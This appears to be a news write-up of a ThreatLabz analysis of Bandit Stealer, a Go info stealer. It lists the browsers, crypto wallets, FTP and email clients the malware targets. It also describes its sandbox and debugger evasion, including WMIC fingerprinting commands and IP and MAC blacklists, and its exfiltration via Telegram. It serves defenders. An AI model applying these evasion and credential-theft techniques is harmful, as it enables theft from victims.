Zscaler ThreatLabz recently tracked “Bandit Malware,” a new info stealer that appeared in April 2023 and snatched the following data from 17 browsers:-
Cookies
Logins
Credit cards
Bandit Stealer swipes credentials for FTP and email clients that are popular, and not only that even it also goes after desktop crypto wallets as well.
The malware, coded in Go (Golang), and the data that is stolen is sent to a C2 server through Telegram. Apart from this, the malware also has the ability to evade virtual environments and automated analysis tools stealthily.
Bandit Stealer Evades Analysis
The Bandit stealer evades both automated and manual analysis by employing several anti-analysis techniques. It leverages the procfs Golang library to gather process info and scans for the following process that awe have mentioned below:-
Xen
Vmware
VirtualBox
KVM
Sandbox
QEMU
jail
When a process matches these names, the Bandit info stealer automatically ends the execution, and the latest Bandit samples verify debugger presence using the Windows API through the following calls:-
Bandit obtains UUID and screen dimensions by using the following WMIC commands:-
wmic csproduct get uuid
wmic desktopmonitor get screenheight, screenwidth
The gathered info aids threat actors in recognizing analysis setups. While to spot the virtual environments, trick the security vendors, and evade suspicion, the Bandit stealer makes use of a wide list of following things:-
IP addresses
MAC addresses
Computer names
User names
Process names
From the ‘api.ipify.org’ Bandit fetches the system’s external IP, and then from the Appendix, it fetches a list of blacklisted IP addresses to compare them with the system’s external IP.
Bandit steals MAC address via GetAdaptersAddresses Windows API, then checks it against an Appendix blacklist. If matched, Bandit exits, and the MACs linked to virtualization may be in the blacklist to evade sandboxes.
Apart from this, Bandit Stealer also obtains additional blacklists using “cmd /c net session” to verify the username and computer name of the victim.
By employing the CreateToolhelp32Snapshot Windows API, Bandit captures a process snapshot and scans it against a blacklist in the Appendix. If a blacklisted process is found running in memory, Bandit terminates.
Browsers Targeted
Here below we have mentioned all the browsers that are targeted by Bandit Stealer:-
Yandex Browser
Iridium Browser
7Star Browser
Vivaldi Browser
Google Chrome
Orbitum
Sputnik
uCozMedia
Microsoft Edge
Torch Web Browser
Kometa Browser
CentBrowser
BraveSoftware
Amigo Browser
Epic Privacy Browser
SeaMonkey browser
QupZilla
Cryptocurrency Wallets Targeted
Here below we have mentioned all the cryptocurrency wallets that are targeted by Bandit Stealer:-
Coinbase wallet extension
Saturn Wallet extension
Binance chain wallet extension
Coin98 Wallet
TronLink Wallet
multibit Bitcoin
Terra Station
Electron Cash
Guildwallet extension
Electrum-btcp
MetaMask extension
Bither Bitcoin wallet
ronin wallet extension
multidoge coin
Kardiachain wallet extension
LiteCoin
Jaxx liberty Wallet
Dash Wallet
Math Wallet extension
Ethereum
Bitpay wallet extension
Exodus
Nifty Wallet extension
Atomic
Armory
Bytecoin Wallet
Coinomi wallet
Monero wallet
dogecoin
FTP client apps targeted
Here below, we have mentioned all the FTP client applications that Bandit Stealer targets:-
BlazeFTP
NovaFTP
Staff-FTP
EasyFTP
DeluxeFTP
ALFTP
GoFTP
32BitFtp
Email Clients Targeted
Here below we have mentioned all the email clients that the Bandit stealer targets:-
MailSpring
Mailbird
Opera Mail
Pocomail
Stolen data resides in files within a sub-folder in the %appdata%\local directory, and the sub-folder name follows [country_code][ip_address] format.
While the file, USERINFO.txt carries Bandit Stealer header and system info.
Bandit leverages Windows 10 v1803’s default cURL utility for versatile data transfer via several standards like:-
HTTP
FTP
SMTP
Moreover, from a hardcoded URL, it downloads the blacklist configuration information by abusing the “pastebin.com”.
Bandit dispatches this information through Telegram to the threat actor once the data collection concludes.
Automated parsing and data extraction by the Bandit threat actor results in a JSON-encoded response.